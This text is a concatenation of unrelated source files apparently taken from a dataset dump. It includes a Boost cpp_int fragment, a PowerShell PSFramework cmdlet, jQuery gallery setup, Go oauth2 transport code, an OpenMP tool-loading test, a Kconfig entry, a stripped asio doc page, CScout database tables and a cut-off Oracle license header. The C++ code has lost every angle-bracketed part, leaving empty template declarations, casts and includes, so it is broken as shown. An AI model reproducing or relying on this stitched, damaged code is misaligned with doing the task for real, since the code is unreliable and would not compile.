mpl::true_&)\r\n {\r\n //\r\n // We assume that c is a sequence of (unsigned) bytes with the most significant byte first:\r\n //\r\n typedef typename base_type::local_limb_type local_limb_type;\r\n *this->limbs() = 0;\r\n if(c.size())\r\n {\r\n typename Container::const_iterator i(c.begin()), j(c.end());\r\n unsigned byte_location = static_cast(c.size() - 1);\r\n while(i != j)\r\n {\r\n unsigned limb = byte_location / sizeof(local_limb_type);\r\n unsigned shift = (byte_location % sizeof(local_limb_type)) * CHAR_BIT;\r\n if(limb == 0)\r\n this->limbs()[0] |= static_cast(static_cast(*i)) << shift;\r\n ++i;\r\n --byte_location;\r\n }\r\n }\r\n }\r\npublic:\r\n template \r\n cpp_int_backend(const Container& c, typename boost::enable_if_c::value>::type const* = 0)\r\n {\r\n //\r\n // We assume that c is a sequence of (unsigned) bytes with the most significant byte first:\r\n //\r\n construct_from_container(c, trivial_tag());\r\n }\r\n template \r\n int compare_imp(const cpp_int_backend& o, const mpl::false_&, const mpl::false_&)const BOOST_NOEXCEPT\r\n {\r\n if(this->sign() != o.sign())\r\n return this->sign() ? -1 : 1;\r\n\r\n // Only do the compare if the same sign:\r\n int result = compare_unsigned(o);\r\n\r\n if(this->sign())\r\n result = -result;\r\n return result;\r\n }\r\n template \r\n int compare_imp(const cpp_int_backend& o, const mpl::true_&, const mpl::false_&)const\r\n {\r\n cpp_int_backend t(*this);\r\n return t.compare(o);\r\n }\r\n template \r\n int compare_imp(const cpp_int_backend& o, const mpl::false_&, const mpl::true_&)const\r\n {\r\n cpp_int_backend t(o);\r\n return compare(t);\r\n }\r\n template \r\n int compare_imp(const cpp_int_backend& o, const mpl::true_&, const mpl::true_&)const BOOST_NOEXCEPT\r\n {\r\n if(this->sign())\r\n {\r\n if(o.sign())\r\n {\r\n return *this->limbs() < *o.limbs() ? 1 : (*this->limbs() > *o.limbs() ? -1 : 0);\r\n }\r\n else\r\n return -1;\r\n }\r\n else\r\n {\r\n if(o.sign())\r\n return 1;\r\n return *this->limbs() < *o.limbs() ? -1 : (*this->limbs() > *o.limbs() ? 1 : 0);\r\n }\r\n }\r\n template \r\n int compare(const cpp_int_backend& o)const BOOST_NOEXCEPT\r\n {\r\n typedef mpl::bool_ >::value> t1;\r\n typedef mpl::bool_ >::value> t2;\r\n return compare_imp(o, t1(), t2());\r\n }\r\n template \r\n int compare_unsigned(const cpp_int_backend& o)const BOOST_NOEXCEPT\r\n {\r\n if(this->size() != o.size())\r\n {\r\n return this->size() > o.size() ? 1 : -1;\r\n }\r\n typename base_type::const_limb_pointer pa = this->limbs();\r\n typename base_type::const_limb_pointer pb = o.limbs();\r\n for(int i = this->size() - 1; i >= 0; --i)\r\n {\r\n if(pa[i] != pb[i])\r\n return pa[i] > pb[i] ? 1 : -1;\r\n }\r\n return 0;\r\n }\r\n template \r\n BOOST_MP_FORCEINLINE typename boost::enable_if, int>::type compare(Arithmetic i)const\r\n {\r\n // braindead version:\r\n cpp_int_backend t;\r\n t = i;\r\n return compare(t);\r\n }\r\n};\r\n\r\n} // namespace backends\r\n\r\nnamespace default_ops{\r\n\r\ntemplate \r\nstruct double_precision_type;\r\n\r\ntemplate \r\nstruct double_precision_type >\r\n{\r\n typedef typename mpl::if_c<\r\n backends::is_fixed_precision >::value,\r\n backends::cpp_int_backend<\r\n (is_void::value ?\r\n 2 * backends::max_precision >::value\r\n : MinBits),\r\n 2 * backends::max_precision >::value,\r\n SignType,\r\n Checked,\r\n Allocator>,\r\n backends::cpp_int_backend\r\n >::type type;\r\n};\r\n\r\n\r\n}\r\n\r\ntemplate \r\nstruct expression_template_default >\r\n{\r\n static const expression_template_option value = et_off;\r\n};\r\n\r\nusing boost::multiprecision::backends::cpp_int_backend;\r\n\r\ntemplate \r\nstruct number_category > : public mpl::int_{};\r\n\r\ntypedef number > cpp_int;\r\ntypedef rational_adaptor > cpp_rational_backend;\r\ntypedef number cpp_rational;\r\n\r\n// Fixed precision unsigned types:\r\ntypedef number > uint128_t;\r\ntypedef number > uint256_t;\r\ntypedef number > uint512_t;\r\ntypedef number > uint1024_t;\r\n\r\n// Fixed precision signed types:\r\ntypedef number > int128_t;\r\ntypedef number > int256_t;\r\ntypedef number > int512_t;\r\ntypedef number > int1024_t;\r\n\r\n// Over again, but with checking enabled this time:\r\ntypedef number > checked_cpp_int;\r\ntypedef rational_adaptor > checked_cpp_rational_backend;\r\ntypedef number checked_cpp_rational;\r\n// Fixed precision unsigned types:\r\ntypedef number > checked_uint128_t;\r\ntypedef number > checked_uint256_t;\r\ntypedef number > checked_uint512_t;\r\ntypedef number > checked_uint1024_t;\r\n\r\n// Fixed precision signed types:\r\ntypedef number > checked_int128_t;\r\ntypedef number > checked_int256_t;\r\ntypedef number > checked_int512_t;\r\ntypedef number > checked_int1024_t;\r\n\r\n#ifdef BOOST_NO_SFINAE_EXPR\r\n\r\nnamespace detail{\r\n\r\ntemplate\r\nstruct is_explicitly_convertible, cpp_int_backend > : public mpl::true_ {};\r\n\r\n}\r\n#endif\r\n\r\n#ifdef _MSC_VER\r\n#pragma warning(pop)\r\n#endif\r\n\r\n}} // namespaces\r\n\r\n//\r\n// Last of all we include the implementations of all the eval_* non member functions:\r\n//\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#ifdef BOOST_MP_USER_DEFINED_LITERALS\r\n#include \r\n#endif\r\n#include \r\n#include \r\n\r\n#endif\r\n"} {"text": "function Register-PSFMessageTransform\n{\n\t<#\n\t\t.SYNOPSIS\n\t\t\tRegisters a scriptblock that can transform message content.\n\t\t\n\t\t.DESCRIPTION\n\t\t\tRegisters a scriptblock that can transform message content.\n\t\t\tThis can be used to convert some kinds of input. Specifically:\n\t\t\t\n\t\t\tTarget:\n\t\t\tWhen specifying a target, this target may require some conversion.\n\t\t\tFor example, an object containing a live connection may need to have a static copy stored instead,\n\t\t\tas otherwise its export on a different runspace may cause access violations.\n\t\t\t\n\t\t\tExceptions:\n\t\t\tSome exceptions may need transforming.\n\t\t\tFor example some APIs might wrap the actual exception into a common wrapper.\n\t\t\tIn this scenario you may want the actual exception in order to provide more specific information.\n\t\t\t\n\t\t\tIn all instances, the scriptblock will be called, receiving only the relevant object as its sole input.\n\t\t\t\n\t\t\tNote: This transformation is performed synchronously on the active runspace. Complex scriptblocks may delay execution times when a matching object is passed.\n\t\t\n\t\t.PARAMETER TargetType\n\t\t\tThe full typename of the target object to apply the scriptblock to.\n\t\t\tAll objects of that typename will be processed through that scriptblock.\n\t\t\n\t\t.PARAMETER ExceptionType\n\t\t\tThe full typename of the exception object to apply the scriptblock to.\n\t\t\tAll objects of that typename will be processed through that scriptblock.\n\t\t\tNote: In case of error records, the type of the Exception Property is inspected. The error record as a whole will not be touched, except for having its exception exchanged.\n\t\t\n\t\t.PARAMETER ScriptBlock\n\t\t\tThe scriptblock that performs the transformation.\n\t\t\n\t\t.PARAMETER TargetTypeFilter\n\t\t\tA filter for the typename of the target object to transform.\n\t\t\tSupports wildcards, but not regex.\n\t\t\tWARNING: Adding too many filter-type transforms may impact overall performance, try to avoid using them!\n\t\t\n\t\t.PARAMETER ExceptionTypeFilter\n\t\t\tA filter for the typename of the exception object to transform.\n\t\t\tSupports wildcards, but not regex.\n\t\t\tWARNING: Adding too many filter-type transforms may impact overall performance, try to avoid using them!\n\t\t\n\t\t.PARAMETER FunctionNameFilter\n\t\t\tDefault: \"*\"\n\t\t\tAllows filtering by function name, in order to consider whether the function is affected.\n\t\t\tSupports wildcards, but not regex.\n\t\t\tWARNING: Adding too many filter-type transforms may impact overall performance, try to avoid using them!\n\t\t\n\t\t.PARAMETER ModuleNameFilter\n\t\t\tDefault: \"*\"\n\t\t\tAllows filtering by module name, in order to consider whether the function is affected.\n\t\t\tSupports wildcards, but not regex.\n\t\t\tWARNING: Adding too many filter-type transforms may impact overall performance, try to avoid using them!\n\t\t\n\t\t.EXAMPLE\n\t\t\tPS C:\\> Register-PSFMessageTransform -TargetType 'mymodule.category.classname' -ScriptBlock $ScriptBlock\n\t\t\t\n\t\t\tWhenever a target object of type 'mymodule.category.classname' is specified, invoke $ScriptBlock (with the object as sole argument) and store the result as target instead.\n\t\t\n\t\t.EXAMPLE\n\t\t\tPS C:\\> Register-PSFMessageTransform -ExceptionType 'mymodule.category.exceptionname' -ScriptBlock $ScriptBlock\n\t\t\t\n\t\t\tWhenever an exception or error record of type 'mymodule.category.classname' is specified, invoke $ScriptBlock (with the object as sole argument) and store the result as exception instead.\n\t\t\tIf the full error record is specified, only the updated exception will be inserted\n\t\n\t\t.EXAMPLE\n\t\t\tPS C:\\> Register-PSFMessageTransform -TargetTypeFilter 'mymodule.category.*' -ScriptBlock $ScriptBlock\n\t\n\t\t\tAdds a transform for all target objects that are of a type whose full name starts with 'mymodule.category.'\n\t\t\tAll target objects matching that typename will be run through the specified scriptblock, which in return generates the new target object.\n\t#>\n\t[CmdletBinding(PositionalBinding = $false, HelpUri = 'https://psframework.org/documentation/commands/PSFramework/Register-PSFMessageTransform')]\n\tParam (\n\t\t[Parameter(Mandatory = $true, ParameterSetName = \"Target\")]\n\t\t[string]\n\t\t$TargetType,\n\t\t\n\t\t[Parameter(Mandatory = $true, ParameterSetName = \"Exception\")]\n\t\t[string]\n\t\t$ExceptionType,\n\t\t\n\t\t[Parameter(Mandatory = $true)]\n\t\t[ScriptBlock]\n\t\t$ScriptBlock,\n\t\t\n\t\t[Parameter(Mandatory = $true, ParameterSetName = \"TargetFilter\")]\n\t\t[string]\n\t\t$TargetTypeFilter,\n\t\t\n\t\t[Parameter(Mandatory = $true, ParameterSetName = \"ExceptionFilter\")]\n\t\t[string]\n\t\t$ExceptionTypeFilter,\n\t\t\n\t\t[Parameter(ParameterSetName = \"TargetFilter\")]\n\t\t[Parameter(ParameterSetName = \"ExceptionFilter\")]\n\t\t$FunctionNameFilter = \"*\",\n\t\t\n\t\t[Parameter(ParameterSetName = \"TargetFilter\")]\n\t\t[Parameter(ParameterSetName = \"ExceptionFilter\")]\n\t\t$ModuleNameFilter = \"*\"\n\t)\n\t\n\tprocess\n\t{\n\t\tif ($TargetType) { [PSFramework.Message.MessageHost]::TargetTransforms[$TargetType] = $ScriptBlock }\n\t\tif ($ExceptionType) { [PSFramework.Message.MessageHost]::ExceptionTransforms[$ExceptionType] = $ScriptBlock }\n\t\t\n\t\tif ($TargetTypeFilter)\n\t\t{\n\t\t\t$condition = New-Object PSFramework.Message.TransformCondition($TargetTypeFilter, $ModuleNameFilter, $FunctionNameFilter, $ScriptBlock, \"Target\")\n\t\t\t[PSFramework.Message.MessageHost]::TargetTransformList.Add($condition)\n\t\t}\n\t\t\n\t\tif ($ExceptionTypeFilter)\n\t\t{\n\t\t\t$condition = New-Object PSFramework.Message.TransformCondition($ExceptionTypeFilter, $ModuleNameFilter, $FunctionNameFilter, $ScriptBlock, \"Exception\")\n\t\t\t[PSFramework.Message.MessageHost]::ExceptionTransformList.Add($condition)\n\t\t}\n\t}\n}"} {"text": "// Portfolio\nvar Portfolio = function() {\n 'use strict';\n\n // Handle Portfolio\n var handlePortfolio = function() {\n $('#js__grid-portfolio-gallery').cubeportfolio({\n filters: '#js__filters-portfolio-gallery',\n layoutMode: 'grid',\n mediaQueries: [{\n width: 1500,\n cols: 3\n }, {\n width: 1100,\n cols: 3\n }, {\n width: 800,\n cols: 3\n }, {\n width: 480,\n cols: 2\n }, {\n width: 320,\n cols: 1\n }],\n defaultFilter: '*',\n gapHorizontal: 2,\n gapVertical: 2,\n gridAdjustment: 'responsive',\n caption: ' ',\n\n // lightbox\n lightboxDelegate: '.cbp-lightbox',\n lightboxGallery: true,\n lightboxTitleSrc: 'data-title',\n });\n }\n\n return {\n init: function() {\n handlePortfolio(); // initial setup for Portfolio\n }\n }\n}();\n\n$(document).ready(function() {\n Portfolio.init();\n});"} {"text": "// Copyright 2014 The Go Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\npackage oauth2\n\nimport (\n\t\"errors\"\n\t\"io\"\n\t\"net/http\"\n\t\"sync\"\n)\n\n// Transport is an http.RoundTripper that makes OAuth 2.0 HTTP requests,\n// wrapping a base RoundTripper and adding an Authorization header\n// with a token from the supplied Sources.\n//\n// Transport is a low-level mechanism. Most code will use the\n// higher-level Config.Client method instead.\ntype Transport struct {\n\t// Source supplies the token to add to outgoing requests'\n\t// Authorization headers.\n\tSource TokenSource\n\n\t// Base is the base RoundTripper used to make HTTP requests.\n\t// If nil, http.DefaultTransport is used.\n\tBase http.RoundTripper\n\n\tmu sync.Mutex // guards modReq\n\tmodReq map[*http.Request]*http.Request // original -> modified\n}\n\n// RoundTrip authorizes and authenticates the request with an\n// access token from Transport's Source.\nfunc (t *Transport) RoundTrip(req *http.Request) (*http.Response, error) {\n\treqBodyClosed := false\n\tif req.Body != nil {\n\t\tdefer func() {\n\t\t\tif !reqBodyClosed {\n\t\t\t\treq.Body.Close()\n\t\t\t}\n\t\t}()\n\t}\n\n\tif t.Source == nil {\n\t\treturn nil, errors.New(\"oauth2: Transport's Source is nil\")\n\t}\n\ttoken, err := t.Source.Token()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq2 := cloneRequest(req) // per RoundTripper contract\n\ttoken.SetAuthHeader(req2)\n\tt.setModReq(req, req2)\n\tres, err := t.base().RoundTrip(req2)\n\n\t// req.Body is assumed to have been closed by the base RoundTripper.\n\treqBodyClosed = true\n\n\tif err != nil {\n\t\tt.setModReq(req, nil)\n\t\treturn nil, err\n\t}\n\tres.Body = &onEOFReader{\n\t\trc: res.Body,\n\t\tfn: func() { t.setModReq(req, nil) },\n\t}\n\treturn res, nil\n}\n\n// CancelRequest cancels an in-flight request by closing its connection.\nfunc (t *Transport) CancelRequest(req *http.Request) {\n\ttype canceler interface {\n\t\tCancelRequest(*http.Request)\n\t}\n\tif cr, ok := t.base().(canceler); ok {\n\t\tt.mu.Lock()\n\t\tmodReq := t.modReq[req]\n\t\tdelete(t.modReq, req)\n\t\tt.mu.Unlock()\n\t\tcr.CancelRequest(modReq)\n\t}\n}\n\nfunc (t *Transport) base() http.RoundTripper {\n\tif t.Base != nil {\n\t\treturn t.Base\n\t}\n\treturn http.DefaultTransport\n}\n\nfunc (t *Transport) setModReq(orig, mod *http.Request) {\n\tt.mu.Lock()\n\tdefer t.mu.Unlock()\n\tif t.modReq == nil {\n\t\tt.modReq = make(map[*http.Request]*http.Request)\n\t}\n\tif mod == nil {\n\t\tdelete(t.modReq, orig)\n\t} else {\n\t\tt.modReq[orig] = mod\n\t}\n}\n\n// cloneRequest returns a clone of the provided *http.Request.\n// The clone is a shallow copy of the struct and its Header map.\nfunc cloneRequest(r *http.Request) *http.Request {\n\t// shallow copy of the struct\n\tr2 := new(http.Request)\n\t*r2 = *r\n\t// deep copy of the Header\n\tr2.Header = make(http.Header, len(r.Header))\n\tfor k, s := range r.Header {\n\t\tr2.Header[k] = append([]string(nil), s...)\n\t}\n\treturn r2\n}\n\ntype onEOFReader struct {\n\trc io.ReadCloser\n\tfn func()\n}\n\nfunc (r *onEOFReader) Read(p []byte) (n int, err error) {\n\tn, err = r.rc.Read(p)\n\tif err == io.EOF {\n\t\tr.runFunc()\n\t}\n\treturn\n}\n\nfunc (r *onEOFReader) Close() error {\n\terr := r.rc.Close()\n\tr.runFunc()\n\treturn err\n}\n\nfunc (r *onEOFReader) runFunc() {\n\tif fn := r.fn; fn != nil {\n\t\tfn()\n\t\tr.fn = nil\n\t}\n}\n"} {"text": "// The OpenMP standard defines 3 ways of providing ompt_start_tool:\n// 1. \"statically-linking the tool’s definition of ompt_start_tool into an OpenMP application\"\n// RUN: %libomp-compile -DCODE -DTOOL && %libomp-run | FileCheck %s\n\n// Note: We should compile the tool without -fopenmp as other tools developer\n// would do. Otherwise this test may pass for the wrong reasons on Darwin.\n// RUN: %clang %flags -DTOOL -shared -fPIC %s -o %T/tool.so\n// 2. \"introducing a dynamically-linked library that includes the tool’s definition of ompt_start_tool into the application’s address space\"\n// 2.1 Link with tool during compilation\n// RUN: %libomp-compile -DCODE %no-as-needed-flag %T/tool.so && %libomp-run | FileCheck %s\n// 2.2 Link with tool during compilation, but AFTER the runtime\n// RUN: %libomp-compile -DCODE -lomp %no-as-needed-flag %T/tool.so && %libomp-run | FileCheck %s\n// 2.3 Inject tool via the dynamic loader\n// RUN: %libomp-compile -DCODE && %preload-tool %libomp-run | FileCheck %s\n\n// 3. \"providing the name of a dynamically-linked library appropriate for the architecture and operating system used by the application in the tool-libraries-var ICV\"\n// RUN: %libomp-compile -DCODE && env OMP_TOOL_LIBRARIES=%T/tool.so %libomp-run | FileCheck %s\n\n// REQUIRES: ompt\n\n/*\n * This file contains code for an OMPT shared library tool to be \n * loaded and the code for the OpenMP executable. \n * -DTOOL enables the code for the tool during compilation\n * -DCODE enables the code for the executable during compilation\n */\n\n#ifdef CODE\n#include \"stdio.h\"\n#include \"omp.h\"\n#include \"omp-tools.h\"\n\nint main()\n{\n #pragma omp parallel num_threads(2)\n {\n #pragma omp master\n {\n int result = omp_control_tool(omp_control_tool_start, 0, NULL);\n printf(\"0: control_tool()=%d\\n\", result);\n }\n }\n\n\n // Check if libomp supports the callbacks for this test.\n // CHECK-NOT: {{^}}0: Could not register callback \n \n // CHECK: {{^}}0: Do not initialize tool\n // CHECK: {{^}}0: control_tool()=-2\n \n\n return 0;\n}\n\n#endif /* CODE */\n\n#ifdef TOOL\n\n#include \n#include \"stdio.h\"\n\nompt_start_tool_result_t* ompt_start_tool(\n unsigned int omp_version,\n const char *runtime_version)\n{\n printf(\"0: Do not initialize tool\\n\");\n return NULL;\n}\n#endif /* TOOL */\n"} {"text": "config DVB_PT1\n\ttristate \"PT1 cards\"\n\tdepends on DVB_CORE && PCI && I2C\n\thelp\n\t Support for Earthsoft PT1 PCI cards.\n\n\t Since these cards have no MPEG decoder onboard, they transmit\n\t only compressed MPEG data over the PCI bus, so you need\n\t an external software decoder to watch TV on your computer.\n\n\t Say Y or M if you own such a device and want to use it.\n\n"} {"text": "\n\n\nwindows::object_handle::assign (1 of 2 overloads)\n\n\n\n\n\n\n\n\n
\"asio
\n
\n
\n\"Prev\"\"Up\"\"Home\"\"Next\"\n
\n
\n\n

\n Assign an existing native handle to the handle.\n

\n
void assign(\n    const native_handle_type & handle);\n
\n
\n\n\n\n
Copyright © 2003-2018 Christopher M. Kohlhoff

\n Distributed under the Boost Software License, Version 1.0. (See accompanying\n file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)\n

\n
\n
\n
\n\"Prev\"\"Up\"\"Home\"\"Next\"\n
\n\n\n"} {"text": "Table: Ids\n EID NAME READONLY UNDEFMACRO MACRO MACROARG ORDINARY SUETAG SUMEMBER LABEL TYPEDEF ENUM YACC FUN CSCOPE LSCOPE UNUSED\n---- -------------- -------- ---------- ----- -------- -------- ------ -------- ----- ------- ----- ----- ----- ------ ------ ------\n 9 foo FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE TRUE FALSE\n 91 MAXDIGIT FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n 159 a FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE\n 331 x FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE TRUE\n 441 main TRUE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE TRUE FALSE\n 489 label FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n 571 qqq FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE TRUE\n1239 nokey FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n2299 lfor1 FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n2975 __DATE__ TRUE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n3295 __TIME__ TRUE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n3575 __FILE__ TRUE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n3865 __LINE__ TRUE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n3939 label2 FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n4055 __STDC__ TRUE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n5355 _cscout_dummy1 TRUE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE TRUE FALSE FALSE\nTable: Tokens\nFID FOFFSET EID\n--- ------- ----\n 2 297 2975\n 2 329 3295\n 2 357 3575\n 2 386 3865\n 2 405 4055\n 2 471 441\n 2 535 5355\n 2 558 5355\n 4 0 9\n 4 15 159\n 4 48 489\n 4 55 159\n 4 123 1239\n 4 130 159\n 4 147 159\n 4 164 159\n 4 193 159\n 4 229 2299\n 4 250 159\n 4 316 9\n 4 393 3939\n 5 8 91\n 5 32 331\n 5 43 441\n 5 56 571\n 5 88 9\nTable: Rest\nFID FOFFSET CODE\n--- ------- -----------------------------------------------------------------------------------\n 2 287 \\u0000a\\u0000a#define \n 2 305 \n 2 320 \\u0000a#define \n 2 337 \n 2 348 \\u0000a#define \n 2 365 \n 2 377 \\u0000a#define \n 2 394 1\\u0000a#define \n 2 413 1\\u0000a\\u0000a\n 2 466 \\u0000aint \n 2 475 ();\\u0000a\n 2 522 \\u0000astatic void \n 2 549 (void) { \n 2 572 (); }\\u0000a\n 3 152 \\u0000a\\u0000a\\u0000a#pragma includepath \n 3 195 \\u0000a\n 3 239 \\u0000astatic void _cscout_dummy2(void) { _cscout_dummy2(); }\\u0000a\n 4 3 ()\\u0000d\\u0000a{\\u0000d\\u0000a\tint \n 4 16 ;\\u0000d\\u0000a\\u0000d\\u0000a\t\n 4 45 \\u0000d\\u0000a\t\n 4 53 : \n 4 56 = 2;\\u0000d\\u0000a\tif (1)\\u0000d\\u0000a\t\t\n 4 119 \\u0000d\\u0000a\t\t\n 4 128 : \n 4 131 = 3;\\u0000d\\u0000a\telse\\u0000d\\u0000a\t\t\n 4 148 = 2;\\u0000d\\u0000a\tswitch (\n 4 165 ) {\\u0000d\\u0000a\tcase 2:\\u0000d\\u0000a\t}\\u0000d\\u0000a\tswitch (\n 4 194 ) {\\u0000d\\u0000a\tdefault:\\u0000d\\u0000a\t}\\u0000d\\u0000a\tfor (;;) {\\u0000d\\u0000a\t\t\n 4 234 :\\u0000d\\u0000a\t}\\u0000d\\u0000a\tswitch (\n 4 251 ) {\\u0000d\\u0000a\t\n 4 281 \\u0000d\\u0000a\tcase 1:\\u0000d\\u0000a\tcase 2:\\u0000d\\u0000a\tdefault:\\u0000d\\u0000a\t\t\n 4 319 ();\\u0000d\\u0000a\t}\\u0000d\\u0000a\t\n 4 390 \\u0000d\\u0000a\t\n 4 399 :\\u0000d\\u0000a}\\u0000d\\u0000a\n 5 0 #define \n 5 16 11\\u0000d\\u0000aextern int \n 5 33 ;\\u0000d\\u0000aextern \n 5 47 ();\\u0000d\\u0000aint \n 5 59 ;\\u0000d\\u0000a\\u0000d\\u0000a\n 5 86 \\u0000d\\u0000a\n 5 91 () {\\u0000d\\u0000a\t\n 5 116 }\\u0000d\\u0000a\\u0000d\\u0000a\nTable: Projects\nPID NAME\n--- -----------\n 16 unspecified\n 17 Prj1\n 18 Prj2\nTable: IdProj\n EID PID\n---- ---\n 9 17\n 159 17\n 441 17\n 489 17\n1239 17\n2299 17\n2975 17\n3295 17\n3575 17\n3865 17\n3939 17\n4055 17\n5355 17\n 9 18\n 91 18\n 159 18\n 331 18\n 441 18\n 489 18\n 571 18\n1239 18\n2299 18\n2975 18\n3295 18\n3575 18\n3865 18\n3939 18\n4055 18\n5355 18\nTable: Files\nFID NAME RO NCHAR NCCOMMENT NSPACE NLCOMMENT NBCOMMENT NLINE MAXLINELEN NSTRING NULINE NPPDIRECTIVE NPPCOND NPPFMACRO NPPOMACRO NPPTOKEN NCTOKEN NCOPIES NSTATEMENT NPFUNCTION NFFUNCTION NPVAR NFVAR NAGGREGATE NAMEMBER NENUM NEMEMBER NINCFILE\n--- -------------- ----- ----- --------- ------ --------- --------- ----- ---------- ------- ------ ------------ ------- --------- --------- -------- ------- ------- ---------- ---------- ---------- ----- ----- ---------- -------- ----- -------- --------\n 2 host-defs.h TRUE 578 367 29 0 3 22 61 3 0 5 0 0 5 37 18 1 1 0 1 0 0 0 0 0 0 0\n 3 host-incs.h TRUE 295 187 13 0 2 13 54 1 0 1 0 0 0 16 0 1 0 0 0 0 0 0 0 0 0 0\n 4 c36-endlabel.c FALSE 405 137 112 0 4 30 63 0 0 0 0 0 0 75 76 1 18 1 0 0 0 0 0 0 0 0\n 5 prj2.c FALSE 121 34 26 2 0 11 21 0 0 1 0 0 1 21 18 1 0 1 0 2 0 0 0 0 0 0\nTable: FileProj\nFID PID\n--- ---\n 2 17\n 3 17\n 4 17\n 1 18\n 2 18\n 3 18\n 4 18\n 5 18\nTable: Definers\nPID CUID BASEFILEID DEFINERID\n--- ---- ---------- ---------\n 18 5 5 2\n 18 5 5 4\nTable: Includers\nPID CUID BASEFILEID INCLUDERID\n--- ---- ---------- ----------\n 17 2 2 1\n 17 4 3 1\n 17 4 4 1\n 18 2 2 1\n 18 2 2 1\n 18 4 3 1\n 18 4 4 1\n 18 5 3 1\n 18 5 5 1\nTable: Providers\nPID CUID PROVIDERID\n--- ---- ----------\n 17 2 2\n 17 4 4\n 18 2 2\n 18 2 2\n 18 4 4\n 18 5 5\nTable: IncTriggers\nPID CUID BASEFILEID DEFINERID FOFFSET LEN\n--- ---- ---------- --------- ------- ---\n 18 5 5 2 471 4\n 18 5 5 4 0 3\nTable: Functions\n ID NAME ISMACRO DEFINED DECLARED FILESCOPED FID FOFFSET FANIN\n---- -------------- ------- ------- -------- ---------- --- ------- -----\n 891 foo FALSE TRUE TRUE FALSE 5 88 1\n4715 main FALSE FALSE TRUE FALSE 2 471 0\n5355 _cscout_dummy1 FALSE TRUE TRUE TRUE 2 535 1\nTable: FunctionMetrics\nFUNCTIONID NCHAR NCCOMMENT NSPACE NLCOMMENT NBCOMMENT NLINE MAXLINELEN NSTRING NULINE NPPDIRECTIVE NPPCOND NPPFMACRO NPPOMACRO NPPTOKEN NCTOKEN NSTMT NOP NUOP NNCONST NCLIT NIF NELSE NSWITCH NCASE NDEFAULT NBREAK NFOR NWHILE NDO NCONTINUE NGOTO NRETURN NPID NFID NMID NID NUPID NUFID NUMID NUID NGNSOC NPARAM MAXNEST NLABEL FANIN FANOUT CCYCL1 CCYCL2 CCYCL3 CSTRUC CHAL IFLOW FIDBEGIN FOFFSETBEGIN FIDEND FOFFSETEND\n---------- ----- --------- ------ --------- --------- ----- ---------- ------- ------ ------------ ------- --------- --------- -------- ------- ----- --- ---- ------- ----- --- ----- ------- ----- -------- ------ ---- ------ --- --------- ----- ------- ---- ---- ---- --- ----- ----- ----- ---- ------ ------ ------- ------ ----- ------ ------ ------ ------ ------ --------- ----- -------- ------------ ------ ----------\n 891 396 137 109 0 4 28 63 0 0 0 0 0 0 71 71 10 3 1 7 0 1 1 3 3 2 0 1 0 0 0 0 0 1 0 0 8 1 0 0 2 16 0 1 4 1 1 6 6 6 1.0E0 59.7947E0 6.0E0 4 8 4 403\n 5355 21 0 3 0 0 1 20 0 0 0 0 0 0 5 5 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 1 0 1 9 0 0 0 1 1 1 1 1 1.0E0 0.0E0 1.0E0 2 557 2 577\nTable: FunctionId\nFUNCTIONID ORDINAL EID\n---------- ------- ----\n 891 0 9\n 4715 0 441\n 5355 0 5355\nTable: Fcalls\nSOURCEID DESTID\n-------- ------\n 891 891\n 5355 5355\nDone\n"} {"text": "/*\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.\n *\n * Copyright (c) 1997-2017 Oracle and/or its affiliates. All rights reserved.\n *\n * The contents of this file are subject to the terms of either the GNU\n * General Public License Version 2 only (\"GPL\") or the Common Development\n * and Distribution License(\"CDDL\") (collectively, the \"License\"). You\n * may not use this file except in compliance with the License. You can\n * obtain a copy of the License at\n * https://oss.oracle.com/licenses/CDDL+GPL-1.1\n * or LICENSE.txt. See the License for the specific\n * language governing permissions and limitations under the License.\n *\n * When distributing the software, include this License Header Notice in each\n * file and include the License file at LICENSE.txt.\n *\n * GPL Classpath Exception:\n * Oracle designates this particular file as subject to the \"Classpath\"\n * exception as provided by Oracle in the GPL Version 2 section of the License\n * file that accompanied this code.\n *\n * Modifications:\n * If applicable, add the following below the License Header, with the fields\n * enclosed by brackets [] replaced by your own identifying information:\n * \"Portions Copyright [year] [name of copyright owner]\"\n *\n * Contributor(s):\n * If you wish your version of this file to be governed by only the CDDL or\n * only the GPL Version 2, indicate your decision by adding \"[Contributor]\n * elects to include this software in this distribution under the [CDDL or GPL\n * Version 2] license.\" If you don't indicate a single choice of license, a\n * recipient has the option to distribute your version of this file under\n * either the CDDL, the GPL Version 2 or to extend the choice of license to\n * its licensees as provided above. However, if you add GPL Version 2 